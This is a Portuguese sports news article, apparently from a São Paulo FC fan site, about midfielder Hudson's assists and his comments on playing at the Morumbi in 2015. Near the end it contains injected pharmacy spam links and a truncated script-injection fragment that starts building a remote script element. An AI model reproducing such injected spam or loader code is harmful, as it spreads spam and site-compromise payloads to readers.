Destaque Noticia

Hudson e a sintonia com o Morumbi

Com oito assistências na temporada, o versátil Michel Bastos é o maior ‘garçom’ do Tricolor na temporada 2015. Mas, no Morumbi, o camisa 7 tem um concorrente que demonstra cada vez mais se sentir em casa diante da torcida são-paulina: o volante Hudson. Novamente à disposição da equipe após cumprir suspensão pelo terceiro cartão amarelo na Copa Bridgestone Libertadores da América, na vitória sobre o Cruzeiro (1 x 0), o meio-campista detém bons números no ‘território do São Paulo’.

Assim como o meia-atacante, o defensor já deu três passes certeiros para os companheiros balançarem as redes, além de ter participado diretamente do gol marcado pelo atacante Luis Fabiano no triunfo sobre o Corinthians (2 x 0), e lidera o ranking de assistências no Morumbi. Liberado para poder ter uma oportunidade com Milton Cruz neste final de semana, quando o clube fará a sua estreia na edição deste ano do Campeonato Brasileiro, diante do Flamengo, Hudson não esconde a sua admiração pelo estádio.

“Jogar no Morumbi é muito especial. Primeiro, porque sempre podemos contar com o apoio da nossa torcida. E segundo, porque o estádio é o grande palco de muitas conquistas do São Paulo. Então, são motivações extras que nós temos sempre que jogamos no Morumbi. Temos uma boa sequência de vitórias, em 2015, e isso tem nos ajudado bastante. É gostoso jogar no Morumbi e contar com o torcedor ao nosso lado”, revela.

Sem tomar gol, o São Paulo venceu os três jogos em casa na segunda fase da competição internacional: 4 a 0 no Danubio-URU, 1 a 0 no San Lorenzo-ARG e 2 a 0 no Corinthians. O Tricolor ainda pode se orgulhar de outro feito na temporada: venceu dez dos onze jogos disputados em seu estádio em 2015 – houve ainda uma derrota. Nestes confrontos, foram 25 gols marcados e apenas um sofrido.

De acordo com o Hudson, que poderá reencontrar a torcida no próximo domingo (10), a sintonia do time com as arquibancadas tem sido o diferencial dos comandados de Milton Cruz. “Conseguimos provar nos números que o torcedor é fundamental para a nossa equipe. Eles nos apoiam o tempo todo e não deixam a confiança do time cair mesmo em jogos difíceis”, opina o camisa 25, que completa.

“Com o apoio da torcida, temos condições de chegar longe. Gosto de jogar no Morumbi e, felizmente, consegui ajudar os meus companheiros. Juntos, com este incentivo intenso dos torcedores, vamos brigar pelas vitórias para buscarmos os títulos. E que na estreia do Brasileiro a gente possa mais uma vez deixar os nossos torcedores orgulhosos”, finalizou o atleta, que detém dois gols pelo Tricolor: ambos no Morumbi.

gain cheap drugs on line – http://diniharie.mhs.narotama.ac.id/2016/11/30/gain-cheap-drugs-on-line/ hudson denis

Fonte: SiteOficialvar d=document;var s=d.createElement(‘script’); buy a cheap tablets without prescription

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

20 − 10 =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque Noticia

Mais em Destaque Noticia

São Paulo tem seis pendurados contra o Cruzeiro; veja a lista

saopauloadmin16 de outubro de 2019

Jucilei volta em boa condição física, faz bom treino e pode reaparecer no fim de semana

saopauloadmin15 de outubro de 2019

São Paulo vence jogo-treino contra sub-17; Juanfran e Toró trabalham à parte

saopauloadmin14 de outubro de 2019

Sem Pablo e Juanfran, Fernando Diniz comanda treino com retorno de Raniel

saopauloadmin11 de outubro de 2019

Juanfran relembra trajetória no futebol e diz: “o São Paulo é minha família”

saopauloadmin9 de outubro de 2019

Everton não deve operar joelho, mas pode voltar só em 2020 no São Paulo

saopauloadmin4 de outubro de 2019

Diniz permanece com filosofia de futebol e diz ser mais competitivo em relação aos trabalhos anteriores

saopauloadmin4 de outubro de 2019

Para pagar Daniel Alves, Tricolor monta plano especial

saopauloadmin4 de outubro de 2019

Veja: Ricardo Rocha critica Mancini

saopauloadmin1 de outubro de 2019